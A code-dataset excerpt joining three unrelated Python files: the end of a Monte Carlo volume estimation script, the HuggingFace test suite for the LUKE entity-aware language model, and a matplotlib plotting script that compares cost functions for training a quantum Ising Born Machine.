x=random.uniform(0, radioRuedaEsferica) #U(0,1/3)
y=random.uniform(0, radioRuedaEsferica) #U(0,1/3)
z=random.uniform(0, radioRuedaEsferica) #U(0,1/3)
if x**2 + y**2 + z**2 <= radioRuedaEsferica**2:
ptosRuedaEsferica += 1
pSuperior = float(ptosCircunfSuperior)/float(nsim)
pCentro = float(ptosCircunfCentro)/float(nsim)
pInferior = float(ptosCircunfInferior)/float(nsim)
pRueda = float(ptosRuedaEsferica)/float(nsim)
# Cilindros superiores
areaCircunfCilindroSuperior = 4*float(ptosCircunfCilindro)/float(nsim)
volumenCilindroSuperior = areaCircunfCilindroSuperior * alturaCilindro
volumenCilindrosSuperiores = volumenCilindroSuperior*2
errorCilindrosSuperiores = abs(volumenCilindrosSuperiores - math.pi*radioCircunfCilindro**2*alturaCilindro*2)
# Semiesfera superior
volumenCircunfSuperior = pSuperior * volumenCubo(radioCircunfSuperior*2)
volumenSemiesferaSuperior = volumenCircunfSuperior/2
errorCirunfSuperior = abs(volumenSemiesferaSuperior - volumenEsferaParaError(radioCircunfSuperior)/2)
# Esfera central
volumenCircunfCentro = pCentro * volumenCubo(radioCircunfCentro*2)
errorCirunfCentro = abs(volumenCircunfCentro - volumenEsferaParaError(radioCircunfCentro))
# Semiesfera inferior
volumenCircunfInferior = pInferior * volumenCubo(radioCirunfInferior*2)
volumenSemiesferaInferior = volumenCircunfInferior/2
errorCirunfInferior = abs(volumenSemiesferaInferior - volumenEsferaParaError(radioCirunfInferior)/2)
# Ruedas inferiores
volumenRueda = pRueda * volumenCubo(radioRuedaEsferica*2)
volumenRuedas = volumenRueda * 3
errorRuedas = abs(volumenRuedas - volumenEsferaParaError(radioRuedaEsferica)*3)
print('Volumen cilindros superiores = ', volumenCilindrosSuperiores, 'Error = ', errorCilindrosSuperiores, 'Nsim ='+str(nsim) + '\n')
print('Volumen semiesfera superior = ', volumenSemiesferaSuperior, 'Error = ', errorCirunfSuperior, 'Nsim ='+str(nsim) + '\n')
print('Volumen circunferencia centro = ', volumenCircunfCentro, 'Error = ', errorCirunfCentro, 'Nsim ='+str(nsim) + '\n')
print('Volumen semiesfera inferior = ', volumenSemiesferaInferior, 'Error = ', errorCirunfInferior, 'Nsim ='+str(nsim) + '\n')
print('Volumen ruedas inferiores = ', volumenRuedas, 'Error = ', errorRuedas, 'Nsim ='+str(nsim) + '\n')
print('Volumen total = ', volumenCilindrosSuperiores + volumenSemiesferaSuperior + volumenCircunfCentro +
volumenSemiesferaInferior + volumenRuedas, 'Error = ', errorCilindrosSuperiores + errorCirunfSuperior +
errorCirunfCentro + errorCirunfInferior + errorRuedas, 'Nsim ='+str(nsim) + '\n') | StarcoderdataPython |
1675001 | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Testing suite for the PyTorch LUKE model. """
import unittest
from transformers import is_torch_available
from transformers.testing_utils import require_torch, slow, torch_device
from .test_configuration_common import ConfigTester
from .test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
LukeConfig,
LukeForEntityClassification,
LukeForEntityPairClassification,
LukeForEntitySpanClassification,
LukeModel,
LukeTokenizer,
)
from transformers.models.luke.modeling_luke import LUKE_PRETRAINED_MODEL_ARCHIVE_LIST
class LukeModelTester:
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
entity_length=3,
mention_length=5,
use_attention_mask=True,
use_token_type_ids=True,
use_entity_ids=True,
use_entity_attention_mask=True,
use_entity_token_type_ids=True,
use_entity_position_ids=True,
use_labels=True,
vocab_size=99,
entity_vocab_size=10,
entity_emb_size=6,
hidden_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=16,
type_sequence_label_size=2,
initializer_range=0.02,
num_entity_classification_labels=9,
num_entity_pair_classification_labels=6,
num_entity_span_classification_labels=4,
use_entity_aware_attention=True,
scope=None,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.entity_length = entity_length
self.mention_length = mention_length
self.use_attention_mask = use_attention_mask
self.use_token_type_ids = use_token_type_ids
self.use_entity_ids = use_entity_ids
self.use_entity_attention_mask = use_entity_attention_mask
self.use_entity_token_type_ids = use_entity_token_type_ids
self.use_entity_position_ids = use_entity_position_ids
self.use_labels = use_labels
self.vocab_size = vocab_size
self.entity_vocab_size = entity_vocab_size
self.entity_emb_size = entity_emb_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.type_sequence_label_size = type_sequence_label_size
self.initializer_range = initializer_range
self.num_entity_classification_labels = num_entity_classification_labels
self.num_entity_pair_classification_labels = num_entity_pair_classification_labels
self.num_entity_span_classification_labels = num_entity_span_classification_labels
self.scope = scope
self.use_entity_aware_attention = use_entity_aware_attention
self.encoder_seq_length = seq_length
self.key_length = seq_length
self.num_hidden_states_types = 2 # hidden_states and entity_hidden_states
def prepare_config_and_inputs(self):
# prepare words
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
attention_mask = None
if self.use_attention_mask:
attention_mask = random_attention_mask([self.batch_size, self.seq_length])
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
# prepare entities
entity_ids = ids_tensor([self.batch_size, self.entity_length], self.entity_vocab_size)
entity_attention_mask = None
if self.use_entity_attention_mask:
entity_attention_mask = random_attention_mask([self.batch_size, self.entity_length])
entity_token_type_ids = None
if self.use_token_type_ids:
entity_token_type_ids = ids_tensor([self.batch_size, self.entity_length], self.type_vocab_size)
entity_position_ids = None
if self.use_entity_position_ids:
entity_position_ids = ids_tensor(
[self.batch_size, self.entity_length, self.mention_length], self.mention_length
)
sequence_labels = None
entity_classification_labels = None
entity_pair_classification_labels = None
entity_span_classification_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
entity_classification_labels = ids_tensor([self.batch_size], self.num_entity_classification_labels)
entity_pair_classification_labels = ids_tensor(
[self.batch_size], self.num_entity_pair_classification_labels
)
entity_span_classification_labels = ids_tensor(
[self.batch_size, self.entity_length], self.num_entity_span_classification_labels
)
config = LukeConfig(
vocab_size=self.vocab_size,
entity_vocab_size=self.entity_vocab_size,
entity_emb_size=self.entity_emb_size,
hidden_size=self.hidden_size,
num_hidden_layers=self.num_hidden_layers,
num_attention_heads=self.num_attention_heads,
intermediate_size=self.intermediate_size,
hidden_act=self.hidden_act,
hidden_dropout_prob=self.hidden_dropout_prob,
attention_probs_dropout_prob=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
type_vocab_size=self.type_vocab_size,
is_decoder=False,
initializer_range=self.initializer_range,
use_entity_aware_attention=self.use_entity_aware_attention,
)
return (
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
)
def create_and_check_model(
self,
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
):
model = LukeModel(config=config)
model.to(torch_device)
model.eval()
# test with words + entities
result = model(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
self.parent.assertEqual(
result.entity_last_hidden_state.shape, (self.batch_size, self.entity_length, self.hidden_size)
)
# test with words only
result = model(input_ids, token_type_ids=token_type_ids)
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
def create_and_check_for_entity_classification(
self,
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
):
config.num_labels = self.num_entity_classification_labels
model = LukeForEntityClassification(config)
model.to(torch_device)
model.eval()
result = model(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
labels=entity_classification_labels,
)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_entity_classification_labels))
def create_and_check_for_entity_pair_classification(
self,
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
):
config.num_labels = self.num_entity_pair_classification_labels
model = LukeForEntityClassification(config)
model.to(torch_device)
model.eval()
result = model(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
labels=entity_pair_classification_labels,
)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_entity_pair_classification_labels))
def create_and_check_for_entity_span_classification(
self,
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
):
config.num_labels = self.num_entity_span_classification_labels
model = LukeForEntitySpanClassification(config)
model.to(torch_device)
model.eval()
entity_start_positions = ids_tensor([self.batch_size, self.entity_length], self.seq_length)
entity_end_positions = ids_tensor([self.batch_size, self.entity_length], self.seq_length)
result = model(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
entity_start_positions=entity_start_positions,
entity_end_positions=entity_end_positions,
labels=entity_span_classification_labels,
)
self.parent.assertEqual(
result.logits.shape, (self.batch_size, self.entity_length, self.num_entity_span_classification_labels)
)
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
(
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
) = config_and_inputs
inputs_dict = {
"input_ids": input_ids,
"token_type_ids": token_type_ids,
"attention_mask": attention_mask,
"entity_ids": entity_ids,
"entity_token_type_ids": entity_token_type_ids,
"entity_attention_mask": entity_attention_mask,
"entity_position_ids": entity_position_ids,
}
return config, inputs_dict
@require_torch
class LukeModelTest(ModelTesterMixin, unittest.TestCase):
all_model_classes = (
(
LukeModel,
LukeForEntityClassification,
LukeForEntityPairClassification,
LukeForEntitySpanClassification,
)
if is_torch_available()
else ()
)
test_pruning = False
test_torchscript = False
test_resize_embeddings = True
test_head_masking = True
def _prepare_for_class(self, inputs_dict, model_class, return_labels=False):
inputs_dict = super()._prepare_for_class(inputs_dict, model_class, return_labels=return_labels)
if model_class == LukeForEntitySpanClassification:
inputs_dict["entity_start_positions"] = torch.zeros(
(self.model_tester.batch_size, self.model_tester.entity_length), dtype=torch.long, device=torch_device
)
inputs_dict["entity_end_positions"] = torch.ones(
(self.model_tester.batch_size, self.model_tester.entity_length), dtype=torch.long, device=torch_device
)
if return_labels:
if model_class in (LukeForEntityClassification, LukeForEntityPairClassification):
inputs_dict["labels"] = torch.zeros(
self.model_tester.batch_size, dtype=torch.long, device=torch_device
)
elif model_class == LukeForEntitySpanClassification:
inputs_dict["labels"] = torch.zeros(
(self.model_tester.batch_size, self.model_tester.entity_length),
dtype=torch.long,
device=torch_device,
)
return inputs_dict
def setUp(self):
self.model_tester = LukeModelTester(self)
self.config_tester = ConfigTester(self, config_class=LukeConfig, hidden_size=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_model(*config_and_inputs)
@slow
def test_model_from_pretrained(self):
for model_name in LUKE_PRETRAINED_MODEL_ARCHIVE_LIST:
model = LukeModel.from_pretrained(model_name)
self.assertIsNotNone(model)
def test_for_entity_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_for_entity_classification(*config_and_inputs)
def test_for_entity_pair_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_for_entity_pair_classification(*config_and_inputs)
def test_for_entity_span_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_for_entity_span_classification(*config_and_inputs)
def test_attention_outputs(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
config.return_dict = True
seq_length = self.model_tester.seq_length
entity_length = self.model_tester.entity_length
key_length = seq_length + entity_length
for model_class in self.all_model_classes:
inputs_dict["output_attentions"] = True
inputs_dict["output_hidden_states"] = False
config.return_dict = True
model = model_class(config)
model.to(torch_device)
model.eval()
with torch.no_grad():
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs.attentions
self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)
# check that output_attentions also work using config
del inputs_dict["output_attentions"]
config.output_attentions = True
model = model_class(config)
model.to(torch_device)
model.eval()
with torch.no_grad():
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs.attentions
self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, seq_length + entity_length, key_length],
)
out_len = len(outputs)
# Check attention is always last and order is fine
inputs_dict["output_attentions"] = True
inputs_dict["output_hidden_states"] = True
model = model_class(config)
model.to(torch_device)
model.eval()
with torch.no_grad():
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
added_hidden_states = self.model_tester.num_hidden_states_types
self.assertEqual(out_len + added_hidden_states, len(outputs))
self_attentions = outputs.attentions
self.assertEqual(len(self_attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(self_attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, seq_length + entity_length, key_length],
)
def test_entity_hidden_states_output(self):
def check_hidden_states_output(inputs_dict, config, model_class):
model = model_class(config)
model.to(torch_device)
model.eval()
with torch.no_grad():
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
entity_hidden_states = outputs.entity_hidden_states
expected_num_layers = getattr(
self.model_tester, "expected_num_hidden_layers", self.model_tester.num_hidden_layers + 1
)
self.assertEqual(len(entity_hidden_states), expected_num_layers)
entity_length = self.model_tester.entity_length
self.assertListEqual(
list(entity_hidden_states[0].shape[-2:]),
[entity_length, self.model_tester.hidden_size],
)
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
inputs_dict["output_hidden_states"] = True
check_hidden_states_output(inputs_dict, config, model_class)
# check that output_hidden_states also work using config
del inputs_dict["output_hidden_states"]
config.output_hidden_states = True
check_hidden_states_output(inputs_dict, config, model_class)
def test_retain_grad_entity_hidden_states(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
config.output_hidden_states = True
config.output_attentions = True
# no need to test all models as different heads yield the same functionality
model_class = self.all_model_classes[0]
model = model_class(config)
model.to(torch_device)
inputs = self._prepare_for_class(inputs_dict, model_class)
outputs = model(**inputs)
output = outputs[0]
entity_hidden_states = outputs.entity_hidden_states[0]
entity_hidden_states.retain_grad()
output.flatten()[0].backward(retain_graph=True)
self.assertIsNotNone(entity_hidden_states.grad)
@require_torch
class LukeModelIntegrationTests(unittest.TestCase):
@slow
def test_inference_base_model(self):
model = LukeModel.from_pretrained("studio-ousia/luke-base").eval()
model.to(torch_device)
tokenizer = LukeTokenizer.from_pretrained("studio-ousia/luke-base", task="entity_classification")
text = "Top seed <NAME> said on Thursday she could hardly believe her luck as a fortuitous netcord helped the new world number one avoid a humiliating second- round exit at Wimbledon ."
span = (39, 42)
encoding = tokenizer(text, entity_spans=[span], add_prefix_space=True, return_tensors="pt")
# move all values to device
for key, value in encoding.items():
encoding[key] = encoding[key].to(torch_device)
outputs = model(**encoding)
# Verify word hidden states
expected_shape = torch.Size((1, 42, 768))
self.assertEqual(outputs.last_hidden_state.shape, expected_shape)
expected_slice = torch.tensor(
[[0.0037, 0.1368, -0.0091], [0.1099, 0.3329, -0.1095], [0.0765, 0.5335, 0.1179]]
).to(torch_device)
self.assertTrue(torch.allclose(outputs.last_hidden_state[0, :3, :3], expected_slice, atol=1e-4))
# Verify entity hidden states
expected_shape = torch.Size((1, 1, 768))
self.assertEqual(outputs.entity_last_hidden_state.shape, expected_shape)
expected_slice = torch.tensor([[0.1457, 0.1044, 0.0174]]).to(torch_device)
self.assertTrue(torch.allclose(outputs.entity_last_hidden_state[0, :3, :3], expected_slice, atol=1e-4))
@slow
def test_inference_large_model(self):
model = LukeModel.from_pretrained("studio-ousia/luke-large").eval()
model.to(torch_device)
tokenizer = LukeTokenizer.from_pretrained("studio-ousia/luke-large", task="entity_classification")
text = "Top seed <NAME> said on Thursday she could hardly believe her luck as a fortuitous netcord helped the new world number one avoid a humiliating second- round exit at Wimbledon ."
span = (39, 42)
encoding = tokenizer(text, entity_spans=[span], add_prefix_space=True, return_tensors="pt")
# move all values to device
for key, value in encoding.items():
encoding[key] = encoding[key].to(torch_device)
outputs = model(**encoding)
# Verify word hidden states
expected_shape = torch.Size((1, 42, 1024))
self.assertEqual(outputs.last_hidden_state.shape, expected_shape)
expected_slice = torch.tensor(
[[0.0133, 0.0865, 0.0095], [0.3093, -0.2576, -0.7418], [-0.1720, -0.2117, -0.2869]]
).to(torch_device)
self.assertTrue(torch.allclose(outputs.last_hidden_state[0, :3, :3], expected_slice, atol=1e-4))
# Verify entity hidden states
expected_shape = torch.Size((1, 1, 1024))
self.assertEqual(outputs.entity_last_hidden_state.shape, expected_shape)
expected_slice = torch.tensor([[0.0466, -0.0106, -0.0179]]).to(torch_device)
self.assertTrue(torch.allclose(outputs.entity_last_hidden_state[0, :3, :3], expected_slice, atol=1e-4))
| StarcoderdataPython |
3354036 | import numpy as np
import ast
import sys
import json
from auxiliary_functions import SampleListToArray
import matplotlib
from matplotlib import rc
rc('text', usetex=True)
rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
matplotlib.rc('xtick', labelsize=30)
matplotlib.rc('ytick', labelsize=30)
import matplotlib.pyplot as plt
from file_operations_in import ReadFromFile, AverageCostsFromFile
from file_operations_out import MakeTrialNameFile, MakeDirectory
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes, mark_inset
'''
This file produces the various plots provided in 'The Born Supremacy: Quantum Advantage and Training of an Ising Born Machine'
'''
####################################################################################################################
# #Compare Costs
###################################################################################################################
def CompareCostFunctions(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs, comparison, legend = True):
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
if all(x.lower() == 'mmd' for x in cost_func) is True:
#If all cost functions to be compared are the mmd,
plot_colour = ['r*-', 'r+-', 'ro-', 'b*-', 'b+-', 'bo-']
else:
plot_colour = ['green', 'darkorange', 'c', 'blue', 'red', 'm']
N_trials = len(N_epochs)
if comparison.lower() == 'probs':
fig, axs = plt.subplots()
data_plot_colour = 'k'
axs.clear()
x = np.arange(len(data_probs_final[0]))
bar_plot_colour = ['green', 'blue', 'red', 'm']
#Plot MMD
axs.bar(x, data_probs_final[0].values(), width=0.1, color= '%s' %data_plot_colour, align='center')
axs.bar(x-(0.2*(0+0.5)), born_final_probs[-5].values(), width=0.1, color='%s' %(bar_plot_colour[-4]), align='center')
axs.bar(x-(0.2*(0+1)), born_final_probs[-3].values(), width=0.1, color='%s' %(bar_plot_colour[-3]), align='center')
axs.bar(x-(0.2*(0+1.5)), born_final_probs[-2].values(), width=0.1, color='%s' %(bar_plot_colour[-2]), align='center')
axs.bar(x-(0.2*(0+2)), born_final_probs[-1].values(), width=0.1, color='%s' %(bar_plot_colour[-1]), align='center')
axs.legend(('Data',r'\textsf{MMD}', r'Sinkhorn', r'Exact Stein', r'Spectral Stein' ), fontsize = 20)
axs.set_xticks(range(len(data_probs_final[0])))
axs.set_xticklabels(list(data_probs_final[0].keys()),rotation=70)
elif comparison.lower() == 'tv':
fig, ax = plt.subplots()
if qc[0][0].lower() == '3':
axins = zoomed_inset_axes(ax, 5, loc='center')
x1, x2, y1, y2 = 190, 200, 0.00, 0.021 # specify the limits
elif qc[0][0].lower() == '4':
axins = zoomed_inset_axes(ax, 2.5, loc='center right')
x1, x2, y1, y2 = 180, 200, 0.02, 0.06 # specify the limits
elif qc[0][0].lower() == '5':
axins = zoomed_inset_axes(ax, 2.5, loc='upper left')
x1, x2, y1, y2 = 0,1 , 0.24, 0.25 # specify the limits
axins.set_xlim(x1, x2) # apply the x-limits
axins.set_ylim(y1, y2) # apply the y-limits
plt.xticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=1, fc="none", ec="0.5")
for trial in range(N_trials):
#Compute Average losses and errors, over a certain number of runs
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
cost_error = np.vstack((lower_error['TV'], upper_error['TV'])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
x = np.arange(0, N_epochs[trial]-1, 1)
if cost_func[trial].lower() == 'mmd':
ax.plot(x, average_loss['TV'], '-', color ='%s' % plot_colour[trial] , label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %( kernel_type[trial][0], learning_rate[trial]))
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
axins.plot(x, average_loss['TV'], color ='%s' % plot_colour[trial] , label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %( kernel_type[trial][0], learning_rate[trial]))
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
elif cost_func[trial].lower() == 'stein':
if score[trial].lower() == 'exact':
# plot_colour = 'r'
ax.plot(x, average_loss['TV'], '-', color ='%s' % plot_colour[trial] , label =r'Stein using Exact score for $\eta_{init}$ = %.3f.'% learning_rate[trial])
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
axins.plot(x, average_loss['TV'], '-', color ='%s' % plot_colour[trial] , label =r'Stein using Exact score for $\eta_{init}$ = %.3f.'% learning_rate[trial])
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
elif score[trial].lower() == 'spectral':
# plot_colour = 'm'
ax.plot(loss[trial][('TV')], '-', color ='%s' % plot_colour[trial], label =r'Stein using Spectral score for $\eta_{init}$ = %.3f.' \
% learning_rate[trial])
axins.plot(loss[trial][('TV')], color ='%s' % plot_colour[trial] , label =r'Stein using Spectral score for $\eta_{init}$ = %.3f.' \
%learning_rate[trial])
elif cost_func[trial].lower() == 'sinkhorn':
ax.plot(x, average_loss['TV'],'-', color ='%s' % plot_colour[trial] , label =r'Sinkhorn using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
axins.plot(x, average_loss['TV'], '-', color ='%s' % plot_colour[trial] , label =r'Sinkhorn using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor= plot_colour[trial] )
ax.legend(loc='best', prop={'size': 20})
elif comparison.lower() == 'cost':
for trial in range(N_trials):
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
except:
print('Average Not found')
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial], runs[trial])
if cost_func[trial].lower() == 'mmd':
plot_colour = ['c', 'y', 'g']
x = np.arange(0, len(average_loss['MMD', 'Train']))
plt.plot(x, average_loss['MMD', 'Train'],'%so-' % plot_colour[trial],\
label =r'$\mathsf{MMD}$ on training set using $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], facecolor= plot_colour[trial], alpha=0.3)
plt.plot(x, average_loss['MMD', 'Test'],'%s-' % plot_colour[trial],\
label =r'$\mathsf{MMD}$ on test set using $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.3, facecolor= plot_colour[trial], interpolate=True)
elif cost_func[trial].lower() == 'stein':
if score[trial].lower() == 'exact':
plot_colour = 'r'
x = np.arange(0, len(average_loss['Stein', 'Train']))
plt.plot(x, average_loss['Stein', 'Train'],'%so-' % plot_colour,\
label =r'Stein using Exact score, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['Stein', 'Train'] - lower_error['Stein', 'Train'],\
average_loss['Stein', 'Train'] + upper_error['Stein', 'Train'], alpha=0.3, facecolor=plot_colour)
elif score[trial].lower() == 'spectral':
plot_colour = 'm'
plt.plot(loss[('Stein', 'Train')], '%so-' % plot_colour, \
label =r'Stein on training set using Spectral score, $\eta_{init}$ = %.3f.' %(learning_rate[trial] ))
plt.plot(loss[('Stein', 'Test')], '%s-' % plot_colour,\
label =r'Stein on test set using Spectral score, $\eta_{init}$ = %.3f.' %( learning_rate[trial]))
elif cost_func[trial].lower() == 'sinkhorn':
plot_colour = 'b'
x = np.arange(0, len(average_loss['Sinkhorn', 'Train']))
plt.plot(x, average_loss['Sinkhorn', 'Train'],'%so-' % plot_colour,\
label =r'Sinkhorn on training set using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['Sinkhorn', 'Train'] - lower_error['Sinkhorn', 'Train'],\
average_loss['Sinkhorn', 'Train'] + upper_error['Sinkhorn', 'Train'], alpha=0.3)
plt.plot(x, average_loss['Sinkhorn', 'Test'],'%s-' % plot_colour,\
label =r'Sinkhorn on test set using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate[trial] )
plt.fill_between(x, average_loss['Sinkhorn', 'Test'] - lower_error['Sinkhorn', 'Test'],\
average_loss['Sinkhorn', 'Test'] + upper_error['Sinkhorn', 'Test'], alpha=0.3, facecolor=plot_colour, interpolate=True)
plt.legend(loc='best', prop={'size': 20})
plt.show()
return
[N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples, batch_size, kernel_type, \
cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs] = [[] for _ in range(16)]
'''THREE QUBITS'''
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.01)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
